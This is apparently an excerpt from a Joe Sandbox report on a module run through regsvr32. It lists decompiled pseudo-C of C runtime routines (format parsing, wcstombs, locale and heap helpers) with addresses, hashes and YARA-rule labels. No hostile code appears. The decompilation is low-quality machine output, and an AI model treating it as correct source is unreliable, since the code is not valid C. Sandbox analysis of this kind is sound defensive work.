				_t160 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t160);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t139 + _t160 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                0x7fef9d3dd3b
                                0x7fef9d3dd3d
                                0x7fef9d3dd4a
                                0x7fef9d3dd53
                                0x7fef9d3dd5c
                                0x7fef9d3dd66
                                0x7fef9d3dd6a
                                0x7fef9d3dd7f
                                0x7fef9d3dd88
                                0x7fef9d3dda0
                                0x7fef9d3dda2
                                0x7fef9d3ddaf
                                0x7fef9d3ddb8
                                0x7fef9d3ddba
                                0x7fef9d3ddc2
                                0x7fef9d3ddd7
                                0x7fef9d3dde8
                                0x7fef9d3ddf7
                                0x7fef9d3de01
                                0x7fef9d3de0f
                                0x7fef9d3de19
                                0x7fef9d3de1f
                                0x7fef9d3de32
                                0x7fef9d3de40
                                0x7fef9d3de4c
                                0x7fef9d3de54
                                0x7fef9d3de5d
                                0x7fef9d3de61
                                0x7fef9d3de6a
                                0x7fef9d3de80
                                0x7fef9d3de91
                                0x7fef9d3de9f
                                0x7fef9d3deab
                                0x7fef9d3deb3
                                0x7fef9d3dec6
                                0x7fef9d3ded7
                                0x7fef9d3dee5
                                0x7fef9d3def1
                                0x7fef9d3def9
                                0x7fef9d3df09
                                0x7fef9d3df19
                                0x7fef9d3df29
                                0x7fef9d3df39
                                0x7fef9d3df49
                                0x7fef9d3df59
                                0x7fef9d3df5b
                                0x7fef9d3df5d
                                0x7fef9d3df68
                                0x7fef9d3df6d
                                0x7fef9d3df76
                                0x7fef9d3df7a
                                0x7fef9d3df80
                                0x7fef9d3df95
                                0x7fef9d3dfa6
                                0x7fef9d3dfb5
                                0x7fef9d3dfdc

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2576288505-734865713
                                • Opcode ID: 84afe223306fb715127401468d722999f495e1b64e531eed53167a130bda57e2
                                • Instruction ID: 8bcff37972761654e6234074656759b20f0543a56075d35ebc75ec1029b84271
                                • Opcode Fuzzy Hash: 84afe223306fb715127401468d722999f495e1b64e531eed53167a130bda57e2
                                • Instruction Fuzzy Hash: 0451FCB2A0C6C28AE7B09B64E8407BEB7E4F394346F600125E6C9879A9D77DD445CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3BDE7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94COMMON
                                Download Yara Rule
                                C-Code - Quality: 24%
                                			E000007FE7FEF9D3BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t113;
				char* _t133;

				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t133 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t133);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t113 + _t133 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}





                                0x7fef9d3bdf2
                                0x7fef9d3bdf4
                                0x7fef9d3be01
                                0x7fef9d3be0a
                                0x7fef9d3be0c
                                0x7fef9d3be14
                                0x7fef9d3be29
                                0x7fef9d3be3a
                                0x7fef9d3be49
                                0x7fef9d3be53
                                0x7fef9d3be61
                                0x7fef9d3be6b
                                0x7fef9d3be71
                                0x7fef9d3be84
                                0x7fef9d3be91
                                0x7fef9d3be9d
                                0x7fef9d3bea5
                                0x7fef9d3beae
                                0x7fef9d3beb2
                                0x7fef9d3bebb
                                0x7fef9d3bed1
                                0x7fef9d3bee2
                                0x7fef9d3bef0
                                0x7fef9d3befc
                                0x7fef9d3bf04
                                0x7fef9d3bf17
                                0x7fef9d3bf28
                                0x7fef9d3bf36
                                0x7fef9d3bf42
                                0x7fef9d3bf4a
                                0x7fef9d3bf5a
                                0x7fef9d3bf6a
                                0x7fef9d3bf7a
                                0x7fef9d3bf8a
                                0x7fef9d3bf9a
                                0x7fef9d3bfaa
                                0x7fef9d3bfac
                                0x7fef9d3bfae
                                0x7fef9d3bfb9
                                0x7fef9d3bfbe
                                0x7fef9d3bfc7
                                0x7fef9d3bfcb
                                0x7fef9d3bfd1
                                0x7fef9d3bfe6
                                0x7fef9d3bff7
                                0x7fef9d3c006
                                0x7fef9d3c02d

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2576288505-192189897
                                • Opcode ID: 9b0d14d024408deea39e0a17da6f412b88ec8238870ee572ebff0cd3a83ccddf
                                • Instruction ID: ff5535f435e3edde8ece23b3de1a4987682526c6b5e3102cfdc31443931d3947
                                • Opcode Fuzzy Hash: 9b0d14d024408deea39e0a17da6f412b88ec8238870ee572ebff0cd3a83ccddf
                                • Instruction Fuzzy Hash: D9416B72A0DAC28AE3F0DB24E8947BEB7E4E380345F600126D2DD869A9DB3DD541CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3DD95 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94COMMON
                                Download Yara Rule
                                C-Code - Quality: 24%
                                			E000007FE7FEF9D3DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t113;
				char* _t133;

				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t133 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t133);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t113 + _t133 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}





                                0x7fef9d3dda0
                                0x7fef9d3dda2
                                0x7fef9d3ddaf
                                0x7fef9d3ddb8
                                0x7fef9d3ddba
                                0x7fef9d3ddc2
                                0x7fef9d3ddd7
                                0x7fef9d3dde8
                                0x7fef9d3ddf7
                                0x7fef9d3de01
                                0x7fef9d3de0f
                                0x7fef9d3de19
                                0x7fef9d3de1f
                                0x7fef9d3de32
                                0x7fef9d3de40
                                0x7fef9d3de4c
                                0x7fef9d3de54
                                0x7fef9d3de5d
                                0x7fef9d3de61
                                0x7fef9d3de6a
                                0x7fef9d3de80
                                0x7fef9d3de91
                                0x7fef9d3de9f
                                0x7fef9d3deab
                                0x7fef9d3deb3
                                0x7fef9d3dec6
                                0x7fef9d3ded7
                                0x7fef9d3dee5
                                0x7fef9d3def1
                                0x7fef9d3def9
                                0x7fef9d3df09
                                0x7fef9d3df19
                                0x7fef9d3df29
                                0x7fef9d3df39
                                0x7fef9d3df49
                                0x7fef9d3df59
                                0x7fef9d3df5b
                                0x7fef9d3df5d
                                0x7fef9d3df68
                                0x7fef9d3df6d
                                0x7fef9d3df76
                                0x7fef9d3df7a
                                0x7fef9d3df80
                                0x7fef9d3df95
                                0x7fef9d3dfa6
                                0x7fef9d3dfb5
                                0x7fef9d3dfdc

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2576288505-734865713
                                • Opcode ID: e93e5a5da9d23810187a949f5699427fbde4a421f2c98764f5e18462d0498a04
                                • Instruction ID: 23759b0de1675013ddf4d03c0cfaf8b870fc7ca6517f58e2c4ab95e624369fc8
                                • Opcode Fuzzy Hash: e93e5a5da9d23810187a949f5699427fbde4a421f2c98764f5e18462d0498a04
                                • Instruction Fuzzy Hash: E5415EB2A0C6C28AE7F09B64E8407BE72E4F384746F600125D6C9875E9DB3DD445CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D26C32 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invoke_watson_if_oneof_swprintf_p
                                • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                • API String ID: 2731067127-3604075083
                                • Opcode ID: a5e89465a157929821ec7ea19f55365b45851ed2ed8ce63167a36004212f5177
                                • Instruction ID: 5622a3d1d015b06430e144c3880eb2afd9b3a378503d823bdd7d048160e8afa8
                                • Opcode Fuzzy Hash: a5e89465a157929821ec7ea19f55365b45851ed2ed8ce63167a36004212f5177
                                • Instruction Fuzzy Hash: BB413C72A0D7C186E7A49B51E8907AEBBA1F784740FA14126D6CD47BA9DB3ED404CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D34F20 Relevance: 9.1, APIs: 6, Instructions: 123COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 41%
                                			E000007FE7FEF9D34F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
				void* _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				void* _v56;
				signed int _v72;
				long long _v80;
				signed int _v88;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t101;
				long long _t113;
				intOrPtr _t116;
				void* _t117;
				long long _t118;
				long long _t121;
				long long _t122;
				long long _t125;
				void* _t164;

				_t113 = __rax;
				_a32 = r9d;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v88 = E000007FE7FEF9D33B70(_a8, _a16, _a24);
				E000007FE7FEF9D2E680(_t79, _t113);
				_v80 = _t113;
				0xf9d24000();
				_v56 = _t113 + 0x100;
				 *_v56 =  *_v56 + 1;
				if (_v88 == 0xffffffff) goto 0xf9d35103;
				if (_v88 - _a32 <= 0) goto 0xf9d35103;
				if (_v88 - 0xffffffff <= 0) goto 0xf9d34fb9;
				_t116 = _a24;
				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0xf9d34fb9;
				goto 0xf9d34fbe;
				E000007FE7FEF9D2E680(E000007FE7FEF9D2CF80(_t116), _t116);
				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
				_t88 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0xf9d35038;
				_t89 = E000007FE7FEF9D2E680(_t88, _t118);
				_v48 = _t118;
				_t90 = E000007FE7FEF9D2E680(_t89, _t118);
				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
				_v40 = _t121;
				goto 0xf9d35041;
				_v40 = 0;
				if (_v40 == 0) goto 0xf9d350f4;
				r9d = _v72;
				_t92 = E000007FE7FEF9D2E680(E000007FE7FEF9D33BD0(_t90, _a8, _a16, _a24), _t121);
				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0xf9d350c9;
				_t93 = E000007FE7FEF9D2E680(_t92, _t122);
				_v32 = _t122;
				E000007FE7FEF9D2E680(_t93, _t122);
				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
				_v24 = _t125;
				goto 0xf9d350d2;
				_v24 = 0;
				r8d = 0x103;
				E000007FE7FEF9D2E6C0(E000007FE7FEF9D3D7E0(_v24, _a8, _t164), _t125, _v80);
				goto 0xf9d350f6;
				_v88 = _v72;
				goto 0xf9d34f83;
				0xf9d24000();
				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0xf9d35131;
				0xf9d24000();
				_v16 = _t125 + 0x100;
				 *_v16 =  *_v16 - 1;
				if (_v88 == 0xffffffff) goto 0xf9d3514a;
				if (_v88 - _a32 <= 0) goto 0xf9d3514a;
				_t101 = E000007FE7FEF9D2CF80(_v16);
				r9d = _v88;
				return E000007FE7FEF9D33BD0(_t101, _a8, _a16, _a24);
			}


























                                0x7fef9d34f20
                                0x7fef9d34f20
                                0x7fef9d34f25
                                0x7fef9d34f2a
                                0x7fef9d34f2f
                                0x7fef9d34f55
                                0x7fef9d34f59
                                0x7fef9d34f5e
                                0x7fef9d34f63
                                0x7fef9d34f6e
                                0x7fef9d34f81
                                0x7fef9d34f88
                                0x7fef9d34f99
                                0x7fef9d34fa4
                                0x7fef9d34fa6
                                0x7fef9d34fb5
                                0x7fef9d34fb7
                                0x7fef9d34fbe
                                0x7fef9d34fcf
                                0x7fef9d34fda
                                0x7fef9d34fde
                                0x7fef9d34fef
                                0x7fef9d34ffc
                                0x7fef9d34ffe
                                0x7fef9d35003
                                0x7fef9d35008
                                0x7fef9d3502e
                                0x7fef9d35031
                                0x7fef9d35036
                                0x7fef9d35038
                                0x7fef9d35047
                                0x7fef9d3504d
                                0x7fef9d3506f
                                0x7fef9d35080
                                0x7fef9d3508d
                                0x7fef9d3508f
                                0x7fef9d35094
                                0x7fef9d35099
                                0x7fef9d350bf
                                0x7fef9d350c2
                                0x7fef9d350c7
                                0x7fef9d350c9
                                0x7fef9d350d2
                                0x7fef9d350ef
                                0x7fef9d350f4
                                0x7fef9d350fa
                                0x7fef9d350fe
                                0x7fef9d35103
                                0x7fef9d3510f
                                0x7fef9d35111
                                0x7fef9d3511c
                                0x7fef9d3512f
                                0x7fef9d35136
                                0x7fef9d35143
                                0x7fef9d35145
                                0x7fef9d3514a
                                0x7fef9d35170

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                • String ID:
                                • API String ID: 2452617236-0
                                • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                • Instruction ID: 79c6626e7a9320abdad6ed0e53fbdedc274fcc22452831ee93149e628ab3cd95
                                • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                • Instruction Fuzzy Hash: EC61F132A0DA8586DAB0DB55E45177EB3A0F7C4789F214625E6CD83B6ACB3ED441CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D29F20 Relevance: 9.0, APIs: 6, Instructions: 46COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E000007FE7FEF9D29F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
				long long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				char _v64;
				long long _v72;
				intOrPtr _t29;
				intOrPtr* _t41;

				_t41 = __rax;
				_a8 = __ecx;
				_v16 = 0xfffffffe;
				_v72 = 0;
				0xf9d266b0();
				 *0xf9d4cd68 = 0;
				if (_a8 != 0xfffffffe) goto 0xf9d29f81;
				 *0xf9d4cd68 = 1;
				_v32 = GetOEMCP();
				E000007FE7FEF9D26800( &_v64);
				goto 0xf9d29fe3;
				if (_a8 != 0xfffffffd) goto 0xf9d29fae;
				 *0xf9d4cd68 = 1;
				_v28 = GetACP();
				E000007FE7FEF9D26800( &_v64);
				_t29 = _v28;
				goto 0xf9d29fe3;
				if (_a8 != 0xfffffffc) goto 0xf9d29fe3;
				 *0xf9d4cd68 = 1;
				E000007FE7FEF9D26840(_t29,  &_v64);
				_v24 =  *((intOrPtr*)( *_t41 + 4));
				E000007FE7FEF9D26800( &_v64);
				goto 0xf9d29ff9;
				_v20 = _a8;
				E000007FE7FEF9D26800( &_v64);
				return _v20;
			}












                                0x7fef9d29f20
                                0x7fef9d29f20
                                0x7fef9d29f28
                                0x7fef9d29f31
                                0x7fef9d29f44
                                0x7fef9d29f4a
                                0x7fef9d29f59
                                0x7fef9d29f5b
                                0x7fef9d29f6b
                                0x7fef9d29f74
                                0x7fef9d29f7f
                                0x7fef9d29f86
                                0x7fef9d29f88
                                0x7fef9d29f98
                                0x7fef9d29fa1
                                0x7fef9d29fa6
                                0x7fef9d29fac
                                0x7fef9d29fb3
                                0x7fef9d29fb5
                                0x7fef9d29fc4
                                0x7fef9d29fcf
                                0x7fef9d29fd8
                                0x7fef9d29fe1
                                0x7fef9d29fe7
                                0x7fef9d29ff0
                                0x7fef9d29ffd

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_
                                • String ID:
                                • API String ID: 1901436342-0
                                • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                • Instruction ID: 704f50b174c78f8dad9e9ad97ccd9f8c7b4629f2dc49822da5bcfb1c8acb2663
                                • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                • Instruction Fuzzy Hash: 2E21A732D0C64186E7A09B28E84436EBBA0E784768F614226E3DD426F9DB7ED545CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3809F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 115COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                • API String ID: 2123368286-552404435
                                • Opcode ID: 2c731414488d35c21f2780f328146d5dcf70469cadf2ee42e60feab36cc6bb66
                                • Instruction ID: b798cd5c2606ce723a50a96b999359d63c775ee68ba37fd19eb3efa8b303dc8f
                                • Opcode Fuzzy Hash: 2c731414488d35c21f2780f328146d5dcf70469cadf2ee42e60feab36cc6bb66
                                • Instruction Fuzzy Hash: C2511936A0DBC586E6B48B19E84476EB3E0F386761F204225D6ED43BE8DF7ED4458B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3BCBD Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON
                                Download Yara Rule
                                C-Code - Quality: 28%
                                			E000007FE7FEF9D3BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t184;
				char* _t204;
				char* _t205;

				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a968 = _a696 & 0x000000ff;
				if (_a968 == 0x20) goto 0xf9d3bd57;
				if (_a968 == 0x23) goto 0xf9d3bd64;
				if (_a968 == 0x2b) goto 0xf9d3bd4a;
				if (_a968 == 0x2d) goto 0xf9d3bd3d;
				if (_a968 == 0x30) goto 0xf9d3bd72;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3bd7d;
